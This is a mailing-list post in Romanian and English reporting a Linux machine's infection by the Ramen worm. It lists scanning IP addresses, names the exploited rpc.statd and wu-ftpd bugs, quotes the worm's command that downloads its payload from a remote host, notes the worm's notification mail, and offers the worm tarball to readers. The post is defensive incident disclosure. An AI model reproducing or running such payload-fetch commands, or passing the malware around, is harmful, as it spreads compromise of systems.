Dupa ce am tot vazut o gramada de scan pe 111 am zis hai sa pun un linux
6.2 instalat standard sa vedem ce se intimpla ,
Surpriza a venit dupa 2 ore dupa ce am pus online pc-ul .... Un Worm se
instalase lejer la conducerea pc-ului si incepuse sa scaneze dupa alte
pc-uri ..... Evident ca instantaneu l-am scos din retea .... Si m-am
apucat de studiu .
Asta e ce am trimis pe BugTraq dar se pare ca baietii nu vor sa posteze
nimic de la mine din motive care ma depasesc ....
===================================================================
Same problems here :
38.232.191.200
24.169.70.243
194.102.254.118
63.146.209.50
130.111.148.69
But the most interesting is :
130.111.148.69 wich seems to be a worm launcher site .
It will connect to the taget machine on 111 or 21 and will exploit the
well known
rpc.statd and wu-ftp 2.6.0 bug to
gain root on the remote machine.
The tar itself is downloaded from the that machine on port 27374 .
" lynx -source http://%s:27374 > /usr/src/.poop/ramen.tgz "
After a succesfull install it seems it will send a mail with the command
:
" echo Eat Your Ramen! | mail -s % % " to some obscure hotmail.com
account .
It seems that it has some sort of class B scanner and exploits for
rpc.statd and
wu-ftpd
If anyone is interested in taking a deeper look in it mail me and i will
send the
ramen.tgz or you can get it from the site i mentioned above.
========================================================
Imediat dupa instalare modifica inetd.conf si se pune pe ascultat tot pe
27374 si incepe sa scaneze .
Si credeti-ma ca scaneaza cu o viteza remarcabila .... direct clase B
random ....
--
Lead programmer,
Mihai Moldovanu ([EMAIL PROTECTED])
WEB: http://tfm.profm.ro/
http://www.developers.ro/
---
Send e-mail to '[EMAIL PROTECTED]' with 'unsubscribe rlug' to
unsubscribe from this list.
